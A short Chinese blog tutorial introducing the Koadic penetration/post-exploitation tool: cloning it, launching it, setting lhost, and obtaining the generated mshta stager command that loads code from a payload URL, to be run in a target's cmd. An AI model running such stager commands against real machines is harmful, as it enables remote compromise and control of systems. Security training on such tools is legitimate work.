渗透工具Koadic

admin

在朋友的博客上看到推荐的一款工具Koadic，我接触了以后发现很不错这款工具的强大之处我觉得就是拿到shell后的各种模块功能，我就自己写出来发给大家看看吧。

首先把项目克隆到本地：

项目地址

1. https://github.com/zerosum0x0/koadic.git

复制代码

然后解压，如果你要安装到你指定的目录就先cd到那个目录在下载，我是复制到那了，所以我解压。如下图

运行koadic

1. cd koadic-master/           //cd到软件目录
   
2. sudo ./koadic          //用最高权限运行koadic

复制代码

打开Koadic，显示需要设置的内容

下图命令如下

(koadic: sta/js/mshta)# info     //

查看需要设置的内容

查看工具使用帮助

(koadic: sta/js/mshta)# help

进入主题 ，开始设置。听着是不是热血沸腾要往下看了，哈哈。其实没啥要讲的，你只需要set lhost

这个命令大家应该都懂得，就是设置本地ip。

如下图

注意看，他生成了一个网址，

其实这是一个恶意网址，里面装载了exploit

最后生成的利用命令如下

mshta http://192.168.0.105:9999/S8QoC

利用方法是放到cmd里面执行

如下图